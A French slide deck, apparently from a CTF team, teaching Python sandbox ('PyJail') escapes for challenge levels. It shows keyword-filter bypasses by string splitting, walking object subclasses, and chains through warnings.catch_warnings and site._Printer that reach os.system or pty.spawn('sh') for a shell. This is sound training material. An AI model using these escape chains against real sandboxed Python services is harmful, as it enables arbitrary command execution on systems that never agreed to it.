PyJails
Qu'est-ce qu'une PyJail ?
Sandbox Python
REPL (Read Eval Print Loop)
Objectif :
- Trouver le flag
- Obtenir un shell
- Quitter la jail
Rappels
class RootMe:
def __init__(self, pseudo='Null'):
self.point = 0
self.pseudo = pseudo
def _get_pseudo(self):
return self.pseudo
def flag(self, points):
self.point += points
def flex(self):
print(f'Salutation {self.pseudo} ! Tu possède {self.point} points, le boss 😎 !')
Driss = RootMe('Driss')
print(f'Pseudo : {Driss._get_pseudo()}')
>> Pseudo : Driss
Driss.flex()
>> Salutation Driss ! Tu possède 0 points, le boss 😎 !
Driss.flag(1)
Driss.flex()
>> Salutation Driss ! Tu possède 1 points, le boss 😎 !
Constructeur
Getter
Méthode
Affichage
POO - Programmation Orientée Objet
Rappels
Tout est objet
import random
object = ().__class__.__base__.__subclasses__()
while 1:
object = dir(object)[random.randint(0, len(dir(object))-1)]
print(object)
>> __repr__
>> join
>> rjust
>> __setattr__
>> swapcase
>> maketrans
>> rjust
>> count
>> lower
>> __len__
>> center
>> translate
>> __getnewargs__
>> isascii
>> rpartition
>> partition
>> zfill
>> maketrans
print(type(int))
>> <class 'type'>
print(type(str))
>> <class 'type'>
print(type(float))
>> <class 'type'>
print(type({}))
>> <class 'dict'>
Rappels
Exec Fonction
exec('print(1)')
>> 1
exec('x = 36; print(x)')
>> 36
Rappels
Eval Fonction
eval('print(1)')
>> 1
eval('x = 36; print(x)')
>> Traceback (most recent call last):
[...]
SyntaxError: invalid syntax
Python Exploit
Python 2 - Input Exploit
print input('>> ')
>> __import__('os').system('ls')
X
X
X
PyJails
PyJail - Level 1/2
PyJails
Listing et bypass
vars() || globals() || locals() # Listing des variables -> En fonction du scope
>> {'__builtins__': <...>, '__name__': '__main__', '__file__': '...', '__doc__': None, '__package__': None}
dir() # Listing des attribus
>> ['__builtins__', '__doc__', '__file__', '__name__', '__package__']
dir(__builtins__)
>> ['ArithmeticError', 'AssertionError', [...] , 'vars', 'zip']
dir(__builtins__.zip)
>> ['__class__', '__delattr__', [...] , '__str__', '__subclasshook__']
eval('__im'+'port__')
eval("__im""port__")
print("__impo""rt__")
dir("__impo""rt__")
PyJails
PyJail - Level 3/4/5
PyJails
print(().__class__)
>> <class 'tuple'>
print(().__class__.__base__)
>> <class 'object'>
print(().__class__.__base__.__subclasses__())
>> [<class 'type'>, <class 'weakref'>, [...] , <class 'traceback.TracebackException'>]
print(().__class__.__base__.__subclasses__()[1])
>> <class 'weakref'>
print(dir(().__class__.__base__.__subclasses__()[1]))
['__call__', '__callback__', [...] , '__str__', '__subclasshook__']
Listing
PyJails
Bypass
dir(__builtins__)
>> ['ArithmeticError', 'AssertionError', [...] , 'vars', 'zip']
getattr(__builtins__, 'ArithmeticError')
>> <class 'ArithmeticError'>
dir(getattr(__builtins__, 'ArithmeticError'))
>> ['__cause__', '__class__', [...] , 'args', 'with_traceback']
getattr(getattr(__builtins__, 'ArithmeticError'), 'with_traceback')
>> <method 'with_traceback' of 'BaseException' objects>
PyJails
PyJail - Level 6/7
PyJails
Listing - Fonction Informations
def Function():
x = 1
print('Hello mister !')
dir(Function)
>> ['__annotations__', [...] , '__code__', [...] , '__str__', '__subclasshook__']
dir(Function.__code__)
>> [ [...] , 'co_code', 'co_consts', 'co_filename', [...] , 'co_name', 'co_names', [...] , 'co_varnames', [...] ]
print(Function.__code__.co_name)
>> Function
print(Function.__code__.co_names)
>> ('print',)
print(Function.__code__.co_filename)
>> D:\Windows\IDE - Projects\PycharmProjects\test.py
print(Function.__code__.co_varnames)
>> ('x',)
print(Function.__code__.co_consts)
>> (None, 1, 'Hello mister')
PyJails
PyJail - Level 8
PyJails
Classe intéressante et bypass
<class 'warnings.catch_warnings'> -> catch_warnings()._module.__builtins__['__import__']
<class 'warnings.catch_warnings'> -> catch_warnings().__repr__.im_func.func_globals["linecache"].os.system('XXX')
<class 'site._Printer'> -> site._Printer._Printer__setup.__globals__['os']
<class 'site.pty'> -> pty.spawn("sh")
<class 'sys'> -> sys.module
_=__builtins__ # Exec jail
_['a']=().__class__
_['a']=_['a'].__base__
_['a']=_['a'].__subclasses__
_['a']()
PyJails
PyJail - Level 9/10
Reversing
Bytes Code - Reversing
Python - Reverse 1/2
PyJails
Que faut-il retenir ?
The end
Rhackgondins team ❤
PyJails
By Kévin (Mizu)
PyJails
- 289